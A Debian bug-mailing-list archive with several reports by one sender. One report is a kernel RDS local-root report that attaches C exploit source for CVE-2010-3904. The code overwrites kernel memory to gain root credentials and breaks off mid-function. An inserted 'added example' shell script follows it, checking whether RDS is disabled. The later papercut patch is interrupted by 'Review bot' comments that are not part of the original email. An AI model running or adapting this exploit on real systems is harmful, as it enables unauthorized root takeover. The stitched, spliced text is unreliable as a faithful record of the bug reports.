Bug#600757: Possible Fix

2010-10-19 Thread Juan Angulo Moreno
tag 600757 pending
thanks

This patch can fix it:

http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=799c10559d60f159ab2232203f222f18fa3c4a5f


-- 
Juan Angulo Moreno



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org



Bug#600757: linux-2.6: Linux RDS Protocol Local Privilege Escalation

2010-10-19 Thread Juan Angulo Moreno
Package: linux-2.6
Version: 2.6.32-5-686
Severity: critical
Tags: security
Justification: root security hole

There is a security hole in all versions of linux-2.6 distributed by Debian.

The attached exploit code can be used to test whether a kernel is vulnerable;
it starts a root shell.

I tested it on Debian Squeeze; a screenshot can be found at
http://i56.tinypic.com/2nh19v6.png


-- 
Juan Angulo Moreno
/* 
 * Linux Kernel <= 2.6.36-rc8 RDS privilege escalation exploit
 * CVE-2010-3904
 * by Dan Rosenberg 
 *
 * Copyright 2010 Virtual Security Research, LLC
 *
 * The handling functions for sending and receiving RDS messages
 * use unchecked __copy_*_user_inatomic functions without any
 * access checks on user-provided pointers.  As a result, by
 * passing a kernel address as an iovec base address in recvmsg-style
 * calls, a local user can overwrite arbitrary kernel memory, which
 * can easily be used to escalate privileges to root.  Alternatively,
 * an arbitrary kernel read can be performed via sendmsg calls.
 *
 * This exploit is simple - it resolves a few kernel symbols,
 * sets the security_ops to the default structure, then overwrites
 * a function pointer (ptrace_traceme) in that structure to point
 * to the payload.  After triggering the payload, the original
 * value is restored.  Hard-coding the offset of this function
 * pointer is a bit inelegant, but I wanted to keep it simple and
 * architecture-independent (i.e. no inline assembly).
 *
 * The vulnerability is yet another example of why you shouldn't
 * allow loading of random packet families unless you actually
 * need them.
 *
 * Greets to spender, kees, taviso, hawkes, team lollerskaters,
 * joberheide, bla, sts, and VSR
 *
 */


#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

#define RECVPORT  
#define SENDPORT 

int prep_sock(int port)
{
	
	int s, ret;
	struct sockaddr_in addr;

	s = socket(PF_RDS, SOCK_SEQPACKET, 0);

	if(s < 0) {
		printf("[*] Could not open socket.\n");
		exit(-1);
	}
	
	memset(&addr, 0, sizeof(addr));

	addr.sin_addr.s_addr = inet_addr("127.0.0.1");
	addr.sin_family = AF_INET;
	addr.sin_port = htons(port);

	ret = bind(s, (struct sockaddr *)&addr, sizeof(addr));

	if(ret < 0) {
		printf("[*] Could not bind socket.\n");
		exit(-1);
	}

	return s;

}

void get_message(unsigned long address, int sock)
{

	recvfrom(sock, (void *)address, sizeof(void *), 0,
		 NULL, NULL);

}

void send_message(unsigned long value, int sock)
{
	
	int size, ret;
	struct sockaddr_in recvaddr;
	struct msghdr msg;
	struct iovec iov;
	unsigned long buf;
	
	memset(&recvaddr, 0, sizeof(recvaddr));

	size = sizeof(recvaddr);

	recvaddr.sin_port = htons(RECVPORT);
	recvaddr.sin_family = AF_INET;
	recvaddr.sin_addr.s_addr = inet_addr("127.0.0.1");

	memset(&msg, 0, sizeof(msg));
	
	msg.msg_name = &recvaddr;
	msg.msg_namelen = sizeof(recvaddr);
	msg.msg_iovlen = 1;
	
	buf = value;

	iov.iov_len = sizeof(buf);
	iov.iov_base = &buf;

	msg.msg_iov = &iov;

	ret = sendmsg(sock, &msg, 0);
	if(ret < 0) {
		printf("[*] Something went wrong sending.\n");
		exit(-1);
	}
}

void write_to_mem(unsigned long addr, unsigned long value, int sendsock, int recvsock)
{

	if(!fork()) {
			sleep(1);
			send_message(value, sendsock);
			exit(1);
	}
	else {
		get_message(addr, recvsock);
		wait(NULL);
	}

}

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

int __attribute__((regparm(3)))
getroot(void * file, void * vma)
{

	commit_creds(prepare_kernel_cred(0));
	return -1;	

}

/* thanks spender... */
unsigned long get_kernel_sym(char *name)
{
	FILE *f;
	unsigned long addr;
	char dummy;
	char sname[512];
	struct utsname ver;
	int ret;
	int rep = 0;
	int oldstyle = 0;

	f = fopen("/proc/kallsyms", "r");
	if (f == NULL) {
		f = fopen("/proc/ksyms", "r");
		if (f == NULL)
			goto fallback;
		oldstyle = 1;
	}

repeat:
	ret = 0;
	while(ret != EOF) {
		if (!oldstyle)
			ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
		else {
			ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
			if (ret == 2) {
char *p;
if (strstr(sname, "_O/") || strstr(sname, "_S."))
	continue;
p = strrchr(sname, '_');
if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
	p = p - 4;
	while (p > (char *)sname && *(p - 1) == '_')
		p--;
	*p = '\0';
}
			}
		}
		if (ret == 0) {
			fscanf(f, "%s\n", sname);
			continue;
		}
		if (!strcmp(name, sname)) {
			fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr
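
The exploit header above and the kernel commit linked in the "Possible Fix" message both point at the same defensive lesson: an unused protocol family should not be auto-loadable by any local user. The following check is an added example, not part of the bug report or the kernel fix; the file name /etc/modprobe.d/disable-rds.conf is an assumed, arbitrary choice, and the sample configurations are constructed.

```shell
#!/bin/sh
# Added example (not from the bug report): report whether the RDS module
# can still be auto-loaded on this host, using the modprobe.d mitigation
# that most hardening guidance recommends for unused protocol families.

# Succeeds (exit 0) when the modprobe.d configuration text given as $1
# contains an "install rds /bin/true" (or /bin/false) line. modprobe then
# runs that command instead of loading the module, so a socket(PF_RDS, ...)
# call from an unprivileged user can no longer pull rds into the kernel.
rds_disabled_in_conf() {
    printf '%s\n' "$1" |
        grep -Eq '^[[:space:]]*install[[:space:]]+rds[[:space:]]+/bin/(true|false)([[:space:]]|$)'
}

# Succeeds when the rds module is loaded in the running kernel.
rds_loaded() {
    [ -r /proc/modules ] && grep -q '^rds ' /proc/modules
}

# Constructed sample configurations used to exercise the check offline.
SAMPLE_DISABLED='# constructed sample
install rds /bin/true'
# A bare blacklist line only affects alias-based loading; an explicit
# "modprobe rds" still succeeds, so the check does not accept it.
SAMPLE_BLACKLIST_ONLY='# constructed sample
blacklist rds'

report() {
    conf=$(cat /etc/modprobe.d/*.conf 2>/dev/null || true)
    if rds_disabled_in_conf "$conf"; then
        echo "rds: auto-loading disabled via modprobe.d"
    else
        echo "rds: still loadable; add 'install rds /bin/true' to /etc/modprobe.d/disable-rds.conf"
    fi
    if rds_loaded; then
        echo "rds: module currently loaded (rmmod rds if nothing uses it)"
    fi
    return 0
}

report
```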

Bug#517568: Waiting for sponsorship

2009-07-14 Thread Juan Angulo Moreno
Hi,

I have uploaded the package to mentors.debian.net
(http://mentors.debian.net/debian/pool/main/m/motion/motion_3.2.11-2.dsc)
and currently waiting for sponsorship.


-- 
Juan Angulo Moreno






Bug#482231: motion: FTBFS: checking size of short int... configure: error: cannot compute sizeof (short int)

2008-05-28 Thread Juan Angulo Moreno
Hi Lucas,

I built motion 3.2.9-2 on an amd64 node with Sid and
it built successfully. You can see the log here:

http://0x29.com.ve/debian/motion/logs/00_checking_size_of_short_int.txt

I use gcc 4.3:

[EMAIL PROTECTED]:~/pkgs/motion/tmp/motion-3.2.9$ x86_64-linux-gnu-gcc -v
Usando especificaciones internas.
Objetivo: x86_64-linux-gnu
Configurado con: ../src/configure -v --with-pkgversion='Debian 4.3.0-5'
--with-bugurl=file:///usr/share/doc/gcc-4.3/README.Bugs
--enable-languages=c,c++,fortran,objc,obj-c++ --prefix=/usr
--enable-shared --with-system-zlib --libexecdir=/usr/lib
--without-included-gettext
--enable-threads=posix --enable-nls
--with-gxx-include-dir=/usr/include/c++/4.3 --program-suffix=-4.3
--enable-clocale=gnu --enable-libstdcxx-debug
--enable-objc-gc --enable-mpfr --enable-cld --enable-checking=release
--build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Modelo de hilos: posix
gcc versión 4.3.1 20080523 (prerelease) (Debian 4.3.0-5)


Lucas Nussbaum wrote:
> Package: motion
> Version: 3.2.9-2
> Severity: serious
> User: [EMAIL PROTECTED]
> Usertags: qa-ftbfs-20080520 qa-ftbfs
> Justification: FTBFS on i386
> 
> Hi,
> 
> During a rebuild of all packages in sid, your package failed to build on
> i386.
> 
> This rebuild was done with gcc 4.3 instead of gcc 4.2, because gcc 4.3
> is now the default on most architectures (even if it's not the case on
> i386 yet).  Consequently, many failures are caused by the switch to gcc
> 4.3.
> If you determine that this failure is caused by gcc 4.3, feel free to
> downgrade this bug to 'important' if your package is only built on i386,
> and this bug is specific to gcc 4.3 (i.e. the package builds fine with
> gcc 4.2).
> 
> Relevant part:
>>  /usr/bin/fakeroot debian/rules clean
>> dh_testdir
>> dh_testroot
>> rm -f build-stamp configure-stamp
>> [ ! -f Makefile ] || /usr/bin/make distclean
>> rm -f config.{sub,guess,log,status}
>> dh_clean 
>>  dpkg-source -b motion-3.2.9
>> dpkg-source: info: using source format `1.0'
>> dpkg-source: info: building motion using existing motion_3.2.9.orig.tar.gz
>> dpkg-source: info: building motion in motion_3.2.9-2.diff.gz
>> dpkg-source: info: building motion in motion_3.2.9-2.dsc
>>  debian/rules build
>> dh_testdir
>> cp -f /usr/share/misc/config.guess config.guess
>> cp -f /usr/share/misc/config.sub config.sub
>> # Add here commands to configure the package.
>> CFLAGS="-Wall -g -O2" LDFLAGS="-Wl,--as-needed" ./configure \
>>  --prefix=/usr \
>>  --bindir=\${prefix}/bin \
>>  --build=i486-linux-gnu \
>>  --host=i486-linux-gnu \
>>  --datadir=\${prefix}/share \
>>  --mandir=\${datadir}/man \
>>  --infodir=\${datadir}/info \
>>  --sysconfdir=/etc/motion \
>>  --with-ffmpeg \
>>  --with-mysql \
>>  --with-pgsql \
>>  --without-optimizecpu \
>>  --without-jpeg-mmx
>> checking for Darwin... no
>> checking for *BSD... no
>> checking for i486-linux-gnu-gcc... i486-linux-gnu-gcc
>> checking for C compiler default output file name... a.out
>> checking whether the C compiler works... yes
>> checking whether we are cross compiling... no
>> checking for suffix of executables... 
>> checking for suffix of object files... o
>> checking whether we are using the GNU C compiler... yes
>> checking whether i486-linux-gnu-gcc accepts -g... yes
>> checking for i486-linux-gnu-gcc option to accept ISO C89... none needed
>> checking for pthread_create in -lpthread... yes
>> checking for libjpeg-mmx... skipping
>> checking for jpeg_set_defaults in -ljpeg... yes
>> checking how to run the C preprocessor... i486-linux-gnu-gcc -E
>> checking for grep that handles long lines and -e... /bin/grep
>> checking for egrep... /bin/grep -E
>> checking for ANSI C header files... yes
>> checking for sys/types.h... yes
>> checking for sys/stat.h... yes
>> checking for stdlib.h... yes
>> checking for string.h... yes
>> checking for memory.h... yes
>> checking for strings.h... yes
>> checking for inttypes.h... yes
>> checking for stdint.h... yes
>> checking for unistd.h... yes
>> checking mjpegtools/jpegutils.h usability... no
>> checking mjpegtools/jpegutils.h presence... no
>> checking for mjpegtools/jpegutils.h... no
>> checking mjpegtools/mjpeg_types.h usability... no
>> checking mjpegtools/mjpeg_types.h presence... no
>> checking for mjpegtools/mjpeg_types.h... no
>> checking mjpegtools... no
>> checking for ffmpeg autodetecting... found for debian
>> checking for ffmpeg headers... found for debian
>> checking file_protocol is defined in ffmpeg ?... no
>> checking for mysql support... testing
>> checking autodect mysql headers... yes
>> checking autodect mysql libs... found
>> checking for PostgreSQL... yes
>> checking for PQcmdTuples in -lpq... no
>> checking for PQoidValue in -lpq... no
>> checking for PQclientEncoding in -lpq..

Bug#462864: Patch

2008-02-21 Thread Juan Angulo Moreno

Package: papercut
Version: 0.9.13-4.1
Severity: serious
Tags: patch

Hi,

In the attachment you will find the patch to repair this bug.


--
Juan Angulo Moreno




--- System information. ---
Architecture: i386
Kernel:   Linux 2.6.22-3-686

Debian Release: lenny/sid

--- Package information. ---
Depends (Version) | Installed
=-+-===
adduser   | 3.105
python| 2.4.4-6
python-support (>= 0.7.1) | 0.7.6

diff -urNp papercut-0.9.13/debian/changelog papercut-0.9.13_new/debian/changelog
--- papercut-0.9.13/debian/changelog	2008-02-21 23:29:57.0 -0430
+++ papercut-0.9.13_new/debian/changelog	2008-02-21 23:43:53.0 -0430
@@ -1,3 +1,15 @@
+papercut (0.9.13-4.1) unstable; urgency=low
+
+  * Non-maintainer upload.
+  * Added debian/papercut.postinst with user/group creation. (Closes: #462864)
+  * Fixed debian/papercut.postrm with delete user support.
+  * Fixed debian/papercut.init (with user daemon support).
+  * Added debian/pyDaemon.py library.
+  * Fixed papercut script with pyDaemon.py.
+  * Fixed .pid file (Its uses the default directory /var/run/papercut).
+
+ -- Juan Angulo Moreno <[EMAIL PROTECTED]>  Wed, 20 Feb 2008 03:29:33 -0430
+
 papercut (0.9.13-4) unstable; urgency=low
 
   * Switch to the new Python Policy. (Closes: #380886)
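Review bot: the entry "Fixed debian/papercut.postrm with delete user support" describes removing the daemon user on package removal, which Debian practice discourages: files left behind may still be owned by that uid, and a later package could reuse the freed id; consider leaving the user in place (or only locking it) and saying so in the changelog. The line "Fixed .pid file (Its uses the default directory /var/run/papercut)" should also read "It uses".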
diff -urNp papercut-0.9.13/debian/control papercut-0.9.13_new/debian/control
--- papercut-0.9.13/debian/control	2008-02-21 23:29:57.0 -0430
+++ papercut-0.9.13_new/debian/control	2008-02-21 18:50:45.0 -0430
@@ -2,14 +2,15 @@ Source: papercut
 Section: news
 Priority: optional
 Maintainer: Jérémy Bobbio <[EMAIL PROTECTED]>
-Build-Depends: debhelper (>= 5.0.37.2), python-support (>= 0.3)
+Build-Depends: debhelper (>= 5.0.37.2), python-support (>= 0.3), dpatch
 Build-Depends-Indep: python, xsltproc, docbook-xsl
-Standards-Version: 3.7.2
+Standards-Version: 3.7.3
+HomePage: http://pessoal.org/papercut/
 XS-Python-Version: current
 
 Package: papercut
 Architecture: all
-Depends: ${python:Depends}
+Depends: ${python:Depends}, adduser
 XB-Python-Version: ${python:Versions}
 Recommends: python-mysqldb, python-pgsql
 Suggests: phpbb2, mysql-server
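Review bot: the added field "+HomePage: http://pessoal.org/papercut/" should be spelled "Homepage:", the canonical name of the field introduced with Policy 3.7.3, the same version this hunk bumps Standards-Version to; tools that key on the exact field name may not recognise the mixed-case form. The "dpatch" added to Build-Depends also has no matching changelog entry or debian/rules change anywhere in this patch, so either drop it or include the patch-system changes it implies.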
@@ -32,5 +33,3 @@ Description: simple and extensible NNTP 
  Please note that Papercut is only a NNTP server, not a full-featured news
  transport system.  It does not handle newsfeeding or other usual news
  software features.
- .
- Homepage: http://pessoal.org/papercut/
diff -urNp papercut-0.9.13/debian/copyright papercut-0.9.13_new/debian/copyright
--- papercut-0.9.13/debian/copyright	2008-02-21 23:29:57.0 -0430
+++ papercut-0.9.13_new/debian/copyright	2008-02-21 19:20:47.0 -0430
@@ -10,25 +10,47 @@ Changes:
   The docs/ directory and its content was removed: IETF RFCs are non-free
   in the DFSG sense.
 
+Files: *
 Copyright:
 
-  (c) 2002-2005 Joao Prado Maia <[EMAIL PROTECTED]>
-
-  Permission is hereby granted, free of charge, to any person obtaining a
-  copy of this software and associated documentation files (the "Software"),
-  to deal in the Software without restriction, including without limitation
-  the rights to use, copy, modify, merge, publish, distribute, sublicense,
-  and/or sell copies of the Software, and to permit persons to whom the
-  Software is furnished to do so, subject to the following conditions:
-
-  The above copyright notice and this permission notice shall be included in
-  all copies or substantial portions of the Software.
-
-  THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
-  IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
-  FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
-  AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
-  LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
-  OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
-  SOFTWARE.
+(c) 2002-2005 Joao Prado Maia <[EMAIL PROTECTED]>
 
+ Permission is hereby granted, free of charge, to any person obtaining a
+ copy of this software and associated documentation files (the "Software"),
+ to deal in the Software without restriction, including without limitation
+ the rights to use, copy, modify, merge, publish, distribute, sublicense,
+ and/or sell copies of the Software, and to permit persons to whom the
+ Software is furnished to do so, subject to the following conditions:
+
+ The above copyright notice and this permission notice shall be included in
+ all copies or substantial portions of the Software.
+
+ THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+ IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+ FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVEN
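Review bot: apart from "+Files: *", everything visible in this hunk only reindents the existing copyright line and MIT licence text from two spaces to one, which is churn that makes an NMU diff harder to review; either keep the original indentation, or, if the intent behind "Files:" is the machine-readable copyright format, convert the whole file consistently (a "License:" field and proper stanzas) rather than adding a single field in front of the old layout.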